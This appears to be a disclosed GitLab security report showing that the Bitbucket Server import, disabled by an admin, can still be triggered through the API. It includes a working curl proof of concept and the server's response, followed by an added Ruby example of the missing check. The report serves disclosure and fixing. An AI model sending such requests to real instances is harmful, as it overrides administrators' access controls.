Bypass Disabled Bitbucket Server import source Project Creation
Summary
As an admin, you can disable the Bitbucket Server import source in the admin page https://:gitlab_instance/admin/application_settings
However, the user can still import a project by using the API. This issue is similar to #29748 (closed)
Steps to reproduce
- As an admin, disable the Bitbucket Server import source in /admin/application_settings/general under Visibility and access controls
- As a regular user, run the following curl command:
curl --request POST \
  --url "http://localhost:3000/api/v4/import/bitbucket_server" \
  --header "content-type: application/json" \
  --header "PRIVATE-TOKEN: [REDACTED by nmalcolm]" \
  --data '{
    "bitbucket_server_url": "http://localhost:7990",
    "bitbucket_server_username": "admin",
    "personal_access_token": "[REDACTED by nmalcolm]",
    "bitbucket_server_project": "FOO",
    "bitbucket_server_repo": "bish"
  }'
where:
- http://localhost:3000 is the local GitLab instance
- http://localhost:7990 is the local Bitbucket Server instance (requests to localhost/local networks are allowed for this test)
In my case I got the response
{"id":25,"name":"BISH","full_path":"/root/BISH","full_name":"Administrator / BISH","import_source":"http://localhost:7990/projects/FOO/repos/bish/browse","import_status":"scheduled","human_import_status_name":"scheduled","provider_link":"http://localhost:7990/projects/FOO/repos/bish/browse"}
and the project was imported anyway.
Impact
Bypass project creation despite the admin setting explicitly disallowing it
What is the current bug behavior?
Bypass project creation despite the admin setting explicitly disallowing it
Edited by Nick Malcolm
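The gap reported above, modelled as an added Ruby example (not GitLab's code and not part of the original issue): an API path that schedules the import without consulting the admin's import-source setting, beside a guarded path that refuses with 403. Class, method and setting names are hypothetical, and the scenario is constructed.

```ruby
# Added illustration; not GitLab source code. All names are hypothetical.

# Stand-in for the instance-wide admin setting listing enabled import sources.
class InstanceSettings
  def initialize(enabled_sources)
    @enabled = enabled_sources
  end

  def import_source_enabled?(name)
    @enabled.include?(name)
  end
end

class ImportDisabled < StandardError; end

# One choke point for web UI and REST API, so no entry path can skip the setting.
class ImportService
  def initialize(settings)
    @settings = settings
  end

  # Behaviour described in the report: the API path never consults the setting.
  def schedule_unchecked(source, repo)
    { "name" => repo, "import_source" => source, "import_status" => "scheduled" }
  end

  # Hardened path: refuse before any project record is created.
  def schedule(source, repo)
    raise ImportDisabled, "#{source} import is disabled" unless @settings.import_source_enabled?(source)
    schedule_unchecked(source, repo)
  end
end

# Maps the outcome to an HTTP status the way an API endpoint would.
def api_import(service, source, repo, guarded:)
  body = guarded ? service.schedule(source, repo) : service.schedule_unchecked(source, repo)
  [201, body]
rescue ImportDisabled => e
  [403, { "message" => e.message }]
end

# Constructed scenario: the admin has disabled the Bitbucket Server source.
SETTINGS = InstanceSettings.new(%w[github gitlab_project])
SERVICE  = ImportService.new(SETTINGS)

if __FILE__ == $PROGRAM_NAME
  p api_import(SERVICE, "bitbucket_server", "bish", guarded: false) # setting ignored
  p api_import(SERVICE, "bitbucket_server", "bish", guarded: true)  # setting enforced
end
```

Placing the check in the shared service rather than in each controller means a regression test can assert the 403 once for every import entry point.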